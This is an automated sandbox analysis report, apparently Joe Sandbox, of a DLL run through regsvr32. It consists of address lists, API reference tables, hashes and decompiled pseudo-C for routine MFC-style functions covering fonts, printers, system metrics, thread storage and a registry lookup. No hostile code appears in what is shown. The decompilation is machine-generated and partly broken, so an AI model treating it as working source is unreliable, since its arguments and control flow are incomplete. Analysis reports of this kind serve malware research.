                                                                                                        0x1000ca94
                                                                                                        0x1000ca98
                                                                                                        0x1000ca9d
                                                                                                        0x1000caa0
                                                                                                        0x1000caab
                                                                                                        0x1000caab
                                                                                                        0x00000000
                                                                                                        0x1000caa0
                                                                                                        0x1000ca36
                                                                                                        0x1000ca38
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ca42
                                                                                                        0x1000ca44
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ca4e
                                                                                                        0x1000ca55
                                                                                                        0x1000ca5a
                                                                                                        0x1000ca5c
                                                                                                        0x1000ca5e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ca60
                                                                                                        0x1000ca65
                                                                                                        0x1000ca67
                                                                                                        0x1000ca67
                                                                                                        0x00000000
                                                                                                        0x1000ca65
                                                                                                        0x1000c9d2
                                                                                                        0x1000c9dd
                                                                                                        0x1000c9f4
                                                                                                        0x00000000
                                                                                                        0x1000c9f4
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1000C98B
                                                                                                        • GetSystemMetrics.USER32 ref: 1000CA3C
                                                                                                        • GlobalLock.KERNEL32 ref: 1000CAA5
                                                                                                        • CreateDialogIndirectParamA.USER32(?,?,?,1000C402,00000000), ref: 1000CAD4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                        • String ID: MS Shell Dlg
                                                                                                        • API String ID: 1736106359-76309092
                                                                                                        • Opcode ID: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
                                                                                                        • Instruction ID: aca18bfbc2af702d8352a65e986f2fe47acd8ccb78c3dcc49b793ffb13d9be50
                                                                                                        • Opcode Fuzzy Hash: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
                                                                                                        • Instruction Fuzzy Hash: AF51A031A0020D9FDB05DFA4C88ADEEBBB4EF45780F254559F442EB199DB349E81CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E100149BE(intOrPtr __ecx, signed int _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v40;
                                                                                                        				void _v68;
                                                                                                        				intOrPtr _v72;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t12;
                                                                                                        				void* _t14;
                                                                                                        				char* _t23;
                                                                                                        				void* _t29;
                                                                                                        				signed short _t30;
                                                                                                        				struct HDC__* _t31;
                                                                                                        				signed int _t32;
                                                                                                        
                                                                                                        				_t12 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v8 = _t12 ^ _t32;
                                                                                                        				_t31 = GetStockObject;
                                                                                                        				_t30 = 0xa;
                                                                                                        				_v72 = __ecx;
                                                                                                        				_t23 = "System";
                                                                                                        				_t14 = GetStockObject(0x11);
                                                                                                        				if(_t14 != 0) {
                                                                                                        					L2:
                                                                                                        					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                                                                                                        						_t23 =  &_v40;
                                                                                                        						_t31 = GetDC(0);
                                                                                                        						if(_v68 < 0) {
                                                                                                        							_v68 =  ~_v68;
                                                                                                        						}
                                                                                                        						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                                                                                                        						ReleaseDC(0, _t31);
                                                                                                        					}
                                                                                                        					L6:
                                                                                                        					_t16 = _a4;
                                                                                                        					if(_a4 == 0) {
                                                                                                        						_t16 = _t30 & 0x0000ffff;
                                                                                                        					}
                                                                                                        					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                        				}
                                                                                                        				_t14 = GetStockObject(0xd);
                                                                                                        				if(_t14 == 0) {
                                                                                                        					goto L6;
                                                                                                        				}
                                                                                                        				goto L2;
                                                                                                        			}

















                                                                                                        0x100149c4
                                                                                                        0x100149cb
                                                                                                        0x100149d0
                                                                                                        0x100149d9
                                                                                                        0x100149dc
                                                                                                        0x100149df
                                                                                                        0x100149e4
                                                                                                        0x100149e8
                                                                                                        0x100149f2
                                                                                                        0x10014a01
                                                                                                        0x10014a05
                                                                                                        0x10014a12
                                                                                                        0x10014a14
                                                                                                        0x10014a16
                                                                                                        0x10014a16
                                                                                                        0x10014a31
                                                                                                        0x10014a34
                                                                                                        0x10014a34
                                                                                                        0x10014a3a
                                                                                                        0x10014a3a
                                                                                                        0x10014a40
                                                                                                        0x10014a42
                                                                                                        0x10014a42
                                                                                                        0x10014a5d
                                                                                                        0x10014a5d
                                                                                                        0x100149ec
                                                                                                        0x100149f0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetStockObject.GDI32(00000011), ref: 100149E4
                                                                                                        • GetStockObject.GDI32(0000000D), ref: 100149EC
                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
                                                                                                        • GetDC.USER32(00000000), ref: 10014A08
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
                                                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
                                                                                                        • ReleaseDC.USER32 ref: 10014A34
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                                                        • String ID: System
                                                                                                        • API String ID: 46613423-3470857405
                                                                                                        • Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
                                                                                                        • Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
                                                                                                        • Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
                                                                                                        • Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 83%
                                                                                                        			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* _t36;
                                                                                                        				void* _t39;
                                                                                                        				long _t41;
                                                                                                        				void* _t42;
                                                                                                        				long _t47;
                                                                                                        				void* _t53;
                                                                                                        				signed int _t55;
                                                                                                        				long* _t62;
                                                                                                        				struct _CRITICAL_SECTION* _t64;
                                                                                                        				void* _t65;
                                                                                                        				void* _t66;
                                                                                                        
                                                                                                        				_push(0x10);
                                                                                                        				E10017BF4(E10028893, __ebx, __edi, __esi);
                                                                                                        				_t62 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                                                                                                        				_t64 = __ecx + 0x1c;
                                                                                                        				 *(_t66 - 0x14) = _t64;
                                                                                                        				EnterCriticalSection(_t64);
                                                                                                        				_t36 =  *(_t66 + 8);
                                                                                                        				if(_t36 <= 0 || _t36 >= _t62[3]) {
                                                                                                        					_push(_t64);
                                                                                                        				} else {
                                                                                                        					_t65 = TlsGetValue( *_t62);
                                                                                                        					if(_t65 == 0) {
                                                                                                        						 *(_t66 - 4) = 0;
                                                                                                        						_t39 = E10013965(0x10);
                                                                                                        						__eflags = _t39;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							_t65 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        						} else {
                                                                                                        							 *_t39 = 0x1002b1d8;
                                                                                                        							_t65 = _t39;
                                                                                                        						}
                                                                                                        						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                                                        						_t51 =  &(_t62[5]);
                                                                                                        						 *(_t65 + 8) = 0;
                                                                                                        						 *(_t65 + 0xc) = 0;
                                                                                                        						E10013A82( &(_t62[5]), _t65);
                                                                                                        						goto L5;
                                                                                                        					} else {
                                                                                                        						_t55 =  *(_t66 + 8);
                                                                                                        						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                                                                                                        							L5:
                                                                                                        							_t75 =  *(_t65 + 0xc);
                                                                                                        							if( *(_t65 + 0xc) != 0) {
                                                                                                        								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
                                                                                                        								_t53 = 2;
                                                                                                        								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                                                                                                        							} else {
                                                                                                        								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
                                                                                                        								_pop(_t53);
                                                                                                        								_t42 = LocalAlloc(0, _t47);
                                                                                                        							}
                                                                                                        							_t76 = _t42;
                                                                                                        							if(_t42 == 0) {
                                                                                                        								LeaveCriticalSection( *(_t66 - 0x14));
                                                                                                        								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
                                                                                                        							}
                                                                                                        							 *(_t65 + 0xc) = _t42;
                                                                                                        							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                                                                                                        							 *(_t65 + 8) = _t62[3];
                                                                                                        							TlsSetValue( *_t62, _t65);
                                                                                                        							_t55 =  *(_t66 + 8);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t36 =  *(_t65 + 0xc);
                                                                                                        					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                                                                                                        						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                                                                                                        					}
                                                                                                        					_push( *(_t66 - 0x14));
                                                                                                        				}
                                                                                                        				LeaveCriticalSection();
                                                                                                        				return E10017C60(_t36);
                                                                                                        			}














                                                                                                        0x10013c4d
                                                                                                        0x10013c54
                                                                                                        0x10013c59
                                                                                                        0x10013c5b
                                                                                                        0x10013c5e
                                                                                                        0x10013c62
                                                                                                        0x10013c65
                                                                                                        0x10013c6b
                                                                                                        0x10013c72
                                                                                                        0x10013d73
                                                                                                        0x10013c81
                                                                                                        0x10013c89
                                                                                                        0x10013c8d
                                                                                                        0x10013cc1
                                                                                                        0x10013cc4
                                                                                                        0x10013cc9
                                                                                                        0x10013ccb
                                                                                                        0x10013cd7
                                                                                                        0x10013cd7
                                                                                                        0x10013ccd
                                                                                                        0x10013ccd
                                                                                                        0x10013cd3
                                                                                                        0x10013cd3
                                                                                                        0x10013cd9
                                                                                                        0x10013cde
                                                                                                        0x10013ce1
                                                                                                        0x10013ce4
                                                                                                        0x10013ce7
                                                                                                        0x00000000
                                                                                                        0x10013c8f
                                                                                                        0x10013c8f
                                                                                                        0x10013c95
                                                                                                        0x10013ca4
                                                                                                        0x10013ca4
                                                                                                        0x10013ca7
                                                                                                        0x10013d0b
                                                                                                        0x10013d11
                                                                                                        0x10013d16
                                                                                                        0x10013ca9
                                                                                                        0x10013cae
                                                                                                        0x10013cb4
                                                                                                        0x10013cb7
                                                                                                        0x10013cb7
                                                                                                        0x10013d1c
                                                                                                        0x10013d1e
                                                                                                        0x10013d23
                                                                                                        0x10013d29
                                                                                                        0x10013d29
                                                                                                        0x10013d31
                                                                                                        0x10013d42
                                                                                                        0x10013d4e
                                                                                                        0x10013d53
                                                                                                        0x10013d59
                                                                                                        0x10013d59
                                                                                                        0x10013c95
                                                                                                        0x10013d5c
                                                                                                        0x10013d61
                                                                                                        0x10013d6b
                                                                                                        0x10013d6b
                                                                                                        0x10013d6e
                                                                                                        0x10013d6e
                                                                                                        0x10013d74
                                                                                                        0x10013d7f

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 10013C54
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
                                                                                                        • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
                                                                                                        • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
                                                                                                        • _memset.LIBCMT ref: 10013D42
                                                                                                        • TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1891723912-0
                                                                                                        • Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
                                                                                                        • Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
                                                                                                        • Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
                                                                                                        • Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 93%
                                                                                                        			E1000A6E3(void* __ecx, char* _a4) {
                                                                                                        				void* _v8;
                                                                                                        				void* _t15;
                                                                                                        				void* _t20;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_t35 = __ecx;
                                                                                                        				_t15 =  *(__ecx + 0x74);
                                                                                                        				if(_t15 != 0) {
                                                                                                        					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                                                        					if(_t15 == 0) {
                                                                                                        						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                                                        						if(_t15 != 0) {
                                                                                                        							_t18 =  *(_t35 + 0x70);
                                                                                                        							if( *(_t35 + 0x70) != 0) {
                                                                                                        								E10014056(_t18);
                                                                                                        							}
                                                                                                        							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                                                        							 *(_t35 + 0x70) = _t20;
                                                                                                        							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                                                        								E10014056( *(_t35 + 0x70));
                                                                                                        								 *(_t35 + 0x70) = 0;
                                                                                                        							}
                                                                                                        							_t15 = ClosePrinter(_v8);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t15;
                                                                                                        			}







                                                                                                        0x1000a6e6
                                                                                                        0x1000a6e8
                                                                                                        0x1000a6ea
                                                                                                        0x1000a6f2
                                                                                                        0x1000a70c
                                                                                                        0x1000a714
                                                                                                        0x1000a71e
                                                                                                        0x1000a725
                                                                                                        0x1000a727
                                                                                                        0x1000a72c
                                                                                                        0x1000a72f
                                                                                                        0x1000a72f
                                                                                                        0x1000a746
                                                                                                        0x1000a74d
                                                                                                        0x1000a765
                                                                                                        0x1000a76a
                                                                                                        0x1000a76f
                                                                                                        0x1000a76f
                                                                                                        0x1000a775
                                                                                                        0x1000a775
                                                                                                        0x1000a725
                                                                                                        0x1000a77a
                                                                                                        0x1000a77e

                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32 ref: 1000A700
                                                                                                        • lstrcmpA.KERNEL32(?,?), ref: 1000A70C
                                                                                                        • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
                                                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
                                                                                                        • GlobalLock.KERNEL32 ref: 1000A750
                                                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
                                                                                                        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775
                                                                                                          • Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
                                                                                                          • Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
                                                                                                          • Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 168474834-0
                                                                                                        • Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
                                                                                                        • Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
                                                                                                        • Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
                                                                                                        • Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10013854(void* __ecx) {
                                                                                                        				struct HDC__* _t18;
                                                                                                        				void* _t19;
                                                                                                        
                                                                                                        				_t19 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
                                                                                                        				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
                                                                                                        				 *0x1005aa30 = GetSystemMetrics(2) + 1;
                                                                                                        				 *0x1005aa34 = GetSystemMetrics(3) + 1;
                                                                                                        				_t18 = GetDC(0);
                                                                                                        				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
                                                                                                        				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
                                                                                                        				return ReleaseDC(0, _t18);
                                                                                                        			}





                                                                                                        0x1001385f
                                                                                                        0x10013865
                                                                                                        0x1001386c
                                                                                                        0x10013874
                                                                                                        0x1001387e
                                                                                                        0x1001388f
                                                                                                        0x10013899
                                                                                                        0x100138a1
                                                                                                        0x100138ad

                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32 ref: 10013861
                                                                                                        • GetSystemMetrics.USER32 ref: 10013868
                                                                                                        • GetSystemMetrics.USER32 ref: 1001386F
                                                                                                        • GetSystemMetrics.USER32 ref: 10013879
                                                                                                        • GetDC.USER32(00000000), ref: 10013883
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
                                                                                                        • ReleaseDC.USER32 ref: 100138A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$CapsDevice$Release
                                                                                                        • String ID:
                                                                                                        • API String ID: 1151147025-0
                                                                                                        • Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
                                                                                                        • Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
                                                                                                        • Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
                                                                                                        • Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
                                                                                                        				char _v4;
                                                                                                        				intOrPtr _v12;
                                                                                                        				char* _v16;
                                                                                                        				void* _v20;
                                                                                                        				char* _v24;
                                                                                                        				char _v28;
                                                                                                        				long _v32;
                                                                                                        				char _v36;
                                                                                                        				char _v272;
                                                                                                        				char _v280;
                                                                                                        				intOrPtr _v292;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t40;
                                                                                                        				char _t44;
                                                                                                        				void* _t47;
                                                                                                        				void* _t54;
                                                                                                        				char* _t61;
                                                                                                        				void* _t77;
                                                                                                        				void* _t80;
                                                                                                        				void* _t81;
                                                                                                        				intOrPtr _t94;
                                                                                                        				void* _t98;
                                                                                                        				void* _t100;
                                                                                                        				void* _t101;
                                                                                                        				char* _t104;
                                                                                                        
                                                                                                        				_t95 = __edx;
                                                                                                        				_t81 = __ecx;
                                                                                                        				_t79 = __ebx;
                                                                                                        				_t104 =  &_v272;
                                                                                                        				_t40 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_a264 = _t40 ^ _t104;
                                                                                                        				_push(0x18);
                                                                                                        				E10017BC1(E10027F63, __ebx, __edi, __esi);
                                                                                                        				_t100 = __ecx;
                                                                                                        				_v20 = 0;
                                                                                                        				_v32 = 0;
                                                                                                        				_t44 = E1000BB54(__ecx, __edx);
                                                                                                        				_v28 = _t44;
                                                                                                        				if(_t44 != 0) {
                                                                                                        					do {
                                                                                                        						__eax =  &_v28;
                                                                                                        						_push(__eax);
                                                                                                        						__ecx = __esi;
                                                                                                        						E1000BB65();
                                                                                                        						__eflags = __eax - __edi;
                                                                                                        						if(__eax != __edi) {
                                                                                                        							__edx =  *__eax;
                                                                                                        							__ecx = __eax;
                                                                                                        							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
                                                                                                        						}
                                                                                                        						__eflags = _v28 - __edi;
                                                                                                        					} while (_v28 != __edi);
                                                                                                        				}
                                                                                                        				__eflags =  *(_t100 + 0x54);
                                                                                                        				if( *(_t100 + 0x54) == 0) {
                                                                                                        					L15:
                                                                                                        					 *[fs:0x0] = _v12;
                                                                                                        					_pop(_t98);
                                                                                                        					_pop(_t101);
                                                                                                        					_pop(_t80);
                                                                                                        					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
                                                                                                        					__eflags =  &_a268;
                                                                                                        					return _t47;
                                                                                                        				} else {
                                                                                                        					__eflags =  *(_t100 + 0x68);
                                                                                                        					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						_push("Software\\");
                                                                                                        						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
                                                                                                        						_v4 = 0;
                                                                                                        						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
                                                                                                        						_push(0x1002a248);
                                                                                                        						_push( &_v16);
                                                                                                        						_push( &_v36);
                                                                                                        						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
                                                                                                        						_push( *(_t100 + 0x68));
                                                                                                        						_v4 = 1;
                                                                                                        						_push(_t54);
                                                                                                        						_push( &_v24);
                                                                                                        						E1000BC25(_t79, 0, _t100, __eflags);
                                                                                                        						_v4 = 3;
                                                                                                        						E10009CB7(_v36 + 0xfffffff0, _t95);
                                                                                                        						_push( &_v24);
                                                                                                        						_push(0x80000001);
                                                                                                        						E1000BC89(_t79, 0, 0x80000001, __eflags);
                                                                                                        						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
                                                                                                        						__eflags = _t61;
                                                                                                        						if(_t61 == 0) {
                                                                                                        							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								_push( &_v16);
                                                                                                        								_push(0x80000001);
                                                                                                        								E1000BC89(_t79, 0, 0x80000001, __eflags);
                                                                                                        							}
                                                                                                        							RegCloseKey(_v20);
                                                                                                        						}
                                                                                                        						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
                                                                                                        						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
                                                                                                        						__eflags =  &(_v16[0xfffffffffffffff0]);
                                                                                                        						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
                                                                                                        						goto L15;
                                                                                                        					} else {
                                                                                                        						_push(_t104);
                                                                                                        						_push(_t81);
                                                                                                        						_v280 = 0x10057298;
                                                                                                        						E10017C83( &_v280, 0x1002e2fc);
                                                                                                        						asm("int3");
                                                                                                        						_push(4);
                                                                                                        						E10017BC1(E10027DEC, _t79, 0, _t100);
                                                                                                        						_t94 = E10013965(0x104);
                                                                                                        						_v292 = _t94;
                                                                                                        						_t77 = 0;
                                                                                                        						_v280 = 0;
                                                                                                        						if(_t94 != 0) {
                                                                                                        							_t77 = E1000CF71(_t94);
                                                                                                        						}
                                                                                                        						return E10017C60(_t77);
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}




























                                                                                                        0x1000bd98
                                                                                                        0x1000bd98
                                                                                                        0x1000bd98
                                                                                                        0x1000bd9f
                                                                                                        0x1000bda3
                                                                                                        0x1000bdaa
                                                                                                        0x1000bdb0
                                                                                                        0x1000bdb7
                                                                                                        0x1000bdbe
                                                                                                        0x1000bdc0
                                                                                                        0x1000bdc3
                                                                                                        0x1000bdc6
                                                                                                        0x1000bdcd
                                                                                                        0x1000bdd0
                                                                                                        0x1000bdd2
                                                                                                        0x1000bdd2
                                                                                                        0x1000bdd5
                                                                                                        0x1000bdd6
